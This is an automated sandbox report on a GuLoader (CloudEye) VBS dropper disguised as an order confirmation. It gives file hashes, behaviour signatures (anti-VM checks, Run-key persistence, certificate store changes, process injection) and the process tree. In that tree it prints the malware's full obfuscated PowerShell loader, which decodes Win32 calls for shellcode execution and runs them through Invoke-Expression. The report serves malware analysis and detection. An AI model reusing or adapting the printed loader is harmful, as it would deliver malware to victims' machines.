Analysis

  • max time kernel
    169s
  • max time network
    172s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-11-2022 14:39

General

  • Target

    答复 CONFIRMATION OF ORDER.vbs

  • Size

    654KB

  • MD5

    c27f7a38b0661de03b69afe76b9697f4

  • SHA1

    36fea8822c1b4d33b405c2ab16423ea6c2a02736

  • SHA256

    d27c6afe237a969751b1e44c98fcd78f93623816162ac349703e9f3f39e542d1

  • SHA512

    56dcc44ac0b0dfcc076cec07eef693928903992cc80fdb0942068dca59f69a0cc6baa3370f3fa9b2865e47f3540de15bd284ae396e42b25421ca57eda5b1f8b2

  • SSDEEP

    12288:1ctF/y6uBCMyplUUb4eK9hjS1cpeMpWKLHFPwC9kxXKxMj3:1v6i0lPLYhW9aLHFPoZKxMj3

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 1 IoCs
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\答复 CONFIRMATION OF ORDER.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2152
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Admiral = """FlutiACowordProlodZoody-FortoTUnhepyPythipDexteeHande Sable-MelleTBattlyEvalupdobbeeLemmuDTopareindowfArbejiichthnFrakriEpenctUblu iFilopoSennenEsthe Indst'TavleurosmasPart iUndernBrandgGstep AuscuSFocusyMikrosNordltLuceneBrevsmTenor;kaempuSincisUligeiHaandnKendsgBogha ForhaSSpindySmagssExtirtPletveSilicmSoodl.ReperRAmmonuDinginRissktFjedeiuteromKkkeneBelav.kajakItestdnOmladtAubrieUnsymrAlbueoChillpStandSLawcreUnsqurQuainvRomboiSkalacReunfeManifsBredb;AustrpSubstuCountbNavlelRangsisedlecWaage VimplsSvendtmilieaCautettelefiDeposcMatth festlcIndkrlScrunaCaphasPlsessParti RevotAcogitfEvaposepiteiHexionSlangdUnwre1Nonde Haand{Satir[ReparDVoldtlPumpmlAntinILovewmTravepAtriuoNonkorindvatStorm(Sport`"""OrgankfemhueAutorrCymblnRemuteIra FlTrick3there2Negle`"""uforu)Angui]prebepEkstruOverrbAtomslImmeriForflcAntin ForsrsShacktKildnaZinnitGodstiErlggcSinds TwinaeAfgrdxPhilotJdekaeSnigerKlagenOmsti KaoliiColopnllebrtGhior MountOArbejpPteroeForumnFantoMTraliuEftertOversePaaklxQuini(DivaniSculpnAfsketAlbum AntetNBolesoKompoeSprogrSerperNitro,KereniTearonpostbtSurfm UdrenOAnemavSulkeesubpe,DuodeiGlsninGrandtHasse RsonnQHeptooinkarpScriphDeles)Lynsn;Conep[BitelDBesttlProvelProcyIHeliomPettipTantioGyptorRigsrtEquin(Snesc`"""VolutwRekyliInfornOmnipmRivebmLobel.dignidKeepslSkamllTvrvi`"""Autok)Klint]SwamppDiplouEgoisbOutbilArvediAppelcTrof GaveksKepaltBloodaUnspetsttteiTolvmcGlauc PleiseCampoxOverfttrolleSeriorUncrunAmphi GonokiEnternGermatDecim MonolwOverdaIdealvIsothePolarOperiouTripttfestsGbrasseMskentsamflDSpaameProduvErstaCNiffeaShadopPrayesSkovs(OrthoiPapisnskaertFresi NicotRExoteeRepagiAlfrinTaage,KonsuiSkiftnKassetKdebr BlotcSSlickpbiotorMarkj,matriiNephrnBerbetSkkes KeltyDImbibaSammehNauselAfsavyHolle)Sport;Irreg[eutelDFootelAmbaglKonomISubtimLngdepAlleroProterNighttNonmo(Grape`"""AutenkUnknoeDebonrMilpanEftereSlvholHypso3Bulni2Hatte`"""Virke)Denot]TredipRozetuflersbLgebolBlowbiSmaabcOvers TravesTalevtInstraGeneatBrainiKendecbedri ProdueSkandxBortltpalameUudtarOmhannUnvor UnmariSystenRefuntBocci opildMCarefuHeighlSoftwDMidesiIndvvvFoste(JapygiAspernrehabtMollu InfluSHelbraFllesvNdigevIndskigryde,HandeiSynopnimpertTses EarfusUnruevSaddeaAndrolGlose,sliddiLarynnBulchtEnsar AppelTParagyAgnoenPredoeMatad)Unpro;Sord [IntreDCatarlrevomlWantoIGoddimNettopchurcoBlissrOctyltOrgan(pansy`"""SulphAToothDPressVeunikAUdbinPUnsolIGhane3Klari2Beowu.FulfiDLargiLSerieLsympa`"""Check)uncyn]PlenupcapsouMaligbUnviclValutiSpndvcOttaw RetirsSkrmttNecesaSkuritemneriMannecArmlo lianeePrebexMorbrtHistoeBruncrFlugtnFinde GenneiBeskanTtpaktSpide CetanGPasfoeJustitAppliSHah ReBesterFlawsvGarloiCorelcHexamePensiDPigeniBefolsLimitpGalealKatteaApandyFlageNDetleaAntismDouzaeCyano(RequiiLysfonVandrtTrito revanSLvtr hEpopjedziggiCodrukKalmu,PanioiAlcohnCannotdisoz AntonRIndsaeNonpeaTudse,UnweaiVerbinPhototDicat AfrogFSvindeWeathtAvioniFormycsuperhKultu,NephiiUltranFttertAfter StangBmeedlrSbefauLimb )Forma;Hvoru[AaremDSkilllGastrlDanesIDits mAntimpUnpenoOrdrerAvlintDroph(Stent`"""HardwkNedvreSkrivrErhvenPoddieBiblilSkaer3Agarw2Rehid`"""Fight)Saaga]SikkepSrgetuJernbbTimeblPrepriTamsvcScudd SallisBrndvtCerioafuromtLretiiDrakocskywr TipsseRedepxRecrutReagieasgerrMahatnBrebl InfuriSkydenSmushtVizie AadriVUnburiPretortrkistmerceuUnrepaRetinlKonspAPay WlHematlLavtloUntedcDelgg(UnstiidissinIllustBlufr herbsvUnsic1Provo,UnvaliPoisinInfertSnubp Indrovcorri2Katal,burdeiEpitanUdstrtGldes DisarvPibek3Ensky,TurfiiPunktnDuteotSavkl NyorivUdsan4Puffe)Indus;Overl[AldohDHjemmlLobstlPrintIjazzgmCrockpElectoOmskrrFortitAnnul(Corri`"""hylobkLp DeeRebstrWestmnAbscieTrepalFootw3Stafe2Forsk`"""Anepi)Dumai]AfforpAmperuUmodnbSlumblLynsniTrypacGersh skftesSatsatMuldzaAntictMimikiViljecMicro OchryeKraefxLassitTelemeCookhrPopednForvr StewavUniatoBaliniAcetadMccab TeletENaturxArmeriSphectXylogPDensirTasteoFormacArchiePreadssulfisCresc(ModiciHaemonSkrivtArkan CyaneGFupmorKvatosIsogavBebyraChumpmTuber)Panor;mooed[ClimaDAberdlmattilAlminIFarvemwergipPreinoTrimerSociottotal(Glove`"""CinnakimproeSjlesrBllednSmidgeEquiplShamp3Revol2Cross`"""Polys)Clair]pectipSmreguPleiobOpgralStarviImbescaflok ProgrsTranstBeramaTravetheathiBgretcInfor FjernePolypxFootntCholeeBasoprJama nPostc GeninIBoghanFarewtpluriPFrekvtOlymprFritu ExtinEKosmenMeniguFangymappliSSecreySjlebsCounttAfkaseGrundmBiancLPilheoViniecMandeaOverilundereCannosBekmpAMenin(ReaktuBeggiiVoldgnReklatUmedd SkvalvWater1Paleh,BarreiSyntanPlanltGyder StitevOppos2Archs)Vilde;Baill}Boreh'Randa;Slich`$LoupsADiakofBrkvesInheriCuartnUngandUnmor3Revol=Penis[AgeneASinapfKandisMissiiNewzenThio dErgs 1Situa]buckr:Kyrin:AktieVMagneiMulserMetaltBeatguUndebaPhotolunsupARallelIngenlMisaroGalmacMisle(Spado0Stemm,Acetu1Forty0Tilsi4Afvis8Mishn5Undst7Strad6Bilfr,Forra1erhve2Arabi2Knyst8konve8Srtry,Ekste6Apart4Gabes)Oplgn;Centr`$BjrgeaMurdermolasgHovedyOrigirDimenoCentrsvret eMarli=Blind(KubikGBogeneYo AstHulle-HarmoIlbenutMartieBlindmGelatPkrydsrUdklkoTorvipBilleeStansrEnakttSorniyUncon Resol-MuehlPIntraaSnupttPolemhAsymm Bortd'HasleHCendyKHovedCSoothUGentl:Comme\HawthSForhaoLavatfTillitBetjewSundhaTitlirselvueAutof\udsknFreligoCentrrInkamsOutbuaCenognPterogCovereLactirWeebl'Latos)Sludr.NivelMdommeeOmdeltCrabbrAfsvkiCleiscrieveiUdtvrzStunseDonnysUlveh;Kapru`$JibbeAundercPannecIndebiOpfrepYird iBondetLaudarSelenaRestilPseud2Sydne1Valua7neddy Admir=Victo motor[StammSPiggeyMytersShauctLineceTonyamSepsi.WundtCForlaoContenupletvEvasieUnderrModeltUndsi]iagtt:Coyny:mytolFSerolrAutogoManifmVideoBSnowiaAccursFrateeFroma6Muggi4CaamaSDurittBiomarCowryiFarmsnBortkgBankg(Roten`$TjeneaMonoprGennegHilsnyerhveritalioFngsesDiskueSubjo)Noble;Epite[dayflSUndecyFenersdiffetPrintefringmKines.IrrigRHeruduTestknAccretLedniiTimormRegnseDesmo.PericITilhrnHalsrtPromoeuforgrGs GeoPusilpbohavSBrinkenickyrArthrvErectiPerikcTimideAddicsNikas.cereaMYdet aLetlirPunktsBeddihKraveaBderelinter]Bemge:Lmlen:FreudCStorroMedivpBetydyEnkel(Optje`$acclaAUnatocPhallcKinkaihjlpepProgriGammetGallerFormeaBefoolBegyn2Bedew1Short7neigh,Stifi Ledsa0Absen,Brneb Rykke Gigli`$CospeASalutfLdstesSkoseiNonsynNynazdPubli3Toupe,Miste Nitro`$PsykoAHypnocBengtcMynheiClaimpKunzsiBorestMenacrMacroaRituelKoger2Alter1Reloc7genop.TryklcBrainoTentiuXanthnSeaqutHacky)Lnene;Ephra[SluicALazylfBlamesFrostiCelannSpidsdPerir1Skygg]Navbr:Infer:RoselEBarndnMetasuTrbukmcountSSuperyFluorsOrdfotThyrieMistrmSelvvLUnsynoTykhucRutsjaPhagolAralieReconsBjerrAVandb(Afvan`$BrandARelokftmrersTrykkiLegernAnathdTrave3Klini,Nonte Splen0Bades)Parav#Saksk;""";Function Afsind4 { param([String]$HS); For($i=5; $i -lt $HS.Length-1; $i+=(5+1)){ $Verdour = $Verdour + $HS.Substring($i, 1); } $Verdour;}$Koldtvandsrrets0 = Afsind4 'KroneIRappoEOpvarXamtsk ';$Koldtvandsrrets1= Afsind4 $Admiral;& ($Koldtvandsrrets0) $Koldtvandsrrets1;;"
      2⤵
      • Checks QEMU agent file
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4972
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4lq3nklh\4lq3nklh.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4344
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA6B0.tmp" "c:\Users\Admin\AppData\Local\Temp\4lq3nklh\CSC855BAB5A8BA42A88BF7569A5DBC88AF.TMP"
          4⤵
            PID:3716
        • C:\Program Files (x86)\internet explorer\ieinstal.exe
          "C:\Program Files (x86)\internet explorer\ieinstal.exe"
          3⤵
          • Checks QEMU agent file
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          PID:2924

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\4lq3nklh\4lq3nklh.dll

      Filesize

      3KB

      MD5

      df42d35c1441d60badf9c65f1c24cec1

      SHA1

      336035f18833ea61b731b4decfa5b348657efbe9

      SHA256

      8756241209873a83e4c48b03ce56a183e71fc9a8410b12e00fc903f3dce43324

      SHA512

      fcb060caad4c0c85fca7a6f590d8c796eecdfba6ceea8edff51671ac06695deb94332dbd7417b0a135f15e0c287bbe8638157c28cfb2fd4aa3ea3335ae217efe

    • C:\Users\Admin\AppData\Local\Temp\RESA6B0.tmp

      Filesize

      1KB

      MD5

      a601c1cd39e68ffb741b6338c235570e

      SHA1

      90d1ba37fbb21ccc14feb981a54f7c6da758b2c2

      SHA256

      8f62dd68d16b85af00c89a3bd567885b101759c8e845e86fac408bcf9a22cfbb

      SHA512

      f46eff43d3016780fcf099a6e2d9c20d9d3f87715595257c42a8611c0b263c1aecd1fa7ac578d500a8041e4d4f63df54fb237eaa64796d9ccc3ac7bf7aef0416

    • \??\c:\Users\Admin\AppData\Local\Temp\4lq3nklh\4lq3nklh.0.cs

      Filesize

      709B

      MD5

      399d074ed20a2e3ab603cab554f0be01

      SHA1

      1583c3cc0c5c8ec0ecce716378f447c54e0fd2ce

      SHA256

      31fc743394290f87bd6b3b282e8cd3faba09f0501a4a4e940d85a233889b089d

      SHA512

      635d9107e5e5540e6de6b3f3f98983143d50c6cf1329c508b9bd244f51204f219a7930f5cb23ee760407cd5249295fac69ba53e5cc1e3122fb5ea62f27b508ec

    • \??\c:\Users\Admin\AppData\Local\Temp\4lq3nklh\4lq3nklh.cmdline

      Filesize

      369B

      MD5

      a4901f95ceff9a88de443effc77b3dcc

      SHA1

      e08387e1b41b6088ac23f1542c7c253decf336a1

      SHA256

      c49e23c01d52518aaf22d5238b2c5ac65c055c34b69845d360a64d45197567ea

      SHA512

      928bebd19d4369c394019e2e87e74ec1f1a378e9c851be362bdecfe535efe48ee5035741477ea135e6214e29486bcd3baa11552c82eeaa98320988281e88762e

    • \??\c:\Users\Admin\AppData\Local\Temp\4lq3nklh\CSC855BAB5A8BA42A88BF7569A5DBC88AF.TMP

      Filesize

      652B

      MD5

      6fb2c4e57458795a74b7fe903f3c9fa1

      SHA1

      11a54c4bd6aafbebc3e3f55af592cc0a0e649a26

      SHA256

      087158c09c0ab29e82e595c45f012433356e33dd2f38e38fd7ef85f9d4afbc13

      SHA512

      3989ffa6639395103427cfdef9aea6562063f3c69d7d0df1b335ffee2c082f113d1e5a1120183a3c5612da073d8728a95fb1eea5334653a4f13e5a3f0b817292

    • memory/2924-155-0x0000000000000000-mapping.dmp

    • memory/2924-158-0x0000000000C70000-0x0000000000D70000-memory.dmp

      Filesize

      1024KB

    • memory/2924-156-0x0000000000C70000-0x0000000000D70000-memory.dmp

      Filesize

      1024KB

    • memory/2924-159-0x0000000000C70000-0x0000000000D70000-memory.dmp

      Filesize

      1024KB

    • memory/2924-160-0x00007FFCA5810000-0x00007FFCA5A05000-memory.dmp

      Filesize

      2.0MB

    • memory/2924-161-0x0000000077AC0000-0x0000000077C63000-memory.dmp

      Filesize

      1.6MB

    • memory/2924-162-0x0000000077AC0000-0x0000000077C63000-memory.dmp

      Filesize

      1.6MB

    • memory/3716-144-0x0000000000000000-mapping.dmp

    • memory/4344-141-0x0000000000000000-mapping.dmp

    • memory/4972-139-0x00000000074A0000-0x0000000007B1A000-memory.dmp

      Filesize

      6.5MB

    • memory/4972-132-0x0000000000000000-mapping.dmp

    • memory/4972-148-0x0000000006FC0000-0x0000000007056000-memory.dmp

      Filesize

      600KB

    • memory/4972-149-0x0000000006F20000-0x0000000006F42000-memory.dmp

      Filesize

      136KB

    • memory/4972-150-0x00000000080D0000-0x0000000008674000-memory.dmp

      Filesize

      5.6MB

    • memory/4972-151-0x0000000006E20000-0x000000000749A000-memory.dmp

      Filesize

      6.5MB

    • memory/4972-152-0x0000000006E20000-0x000000000749A000-memory.dmp

      Filesize

      6.5MB

    • memory/4972-153-0x00007FFCA5810000-0x00007FFCA5A05000-memory.dmp

      Filesize

      2.0MB

    • memory/4972-154-0x0000000077AC0000-0x0000000077C63000-memory.dmp

      Filesize

      1.6MB

    • memory/4972-140-0x0000000006110000-0x000000000612A000-memory.dmp

      Filesize

      104KB

    • memory/4972-138-0x0000000005BB0000-0x0000000005BCE000-memory.dmp

      Filesize

      120KB

    • memory/4972-157-0x0000000077AC0000-0x0000000077C63000-memory.dmp

      Filesize

      1.6MB

    • memory/4972-137-0x00000000054E0000-0x0000000005546000-memory.dmp

      Filesize

      408KB

    • memory/4972-136-0x0000000005470000-0x00000000054D6000-memory.dmp

      Filesize

      408KB

    • memory/4972-135-0x0000000004CF0000-0x0000000004D12000-memory.dmp

      Filesize

      136KB

    • memory/4972-134-0x0000000004D50000-0x0000000005378000-memory.dmp

      Filesize

      6.2MB

    • memory/4972-133-0x0000000004640000-0x0000000004676000-memory.dmp

      Filesize

      216KB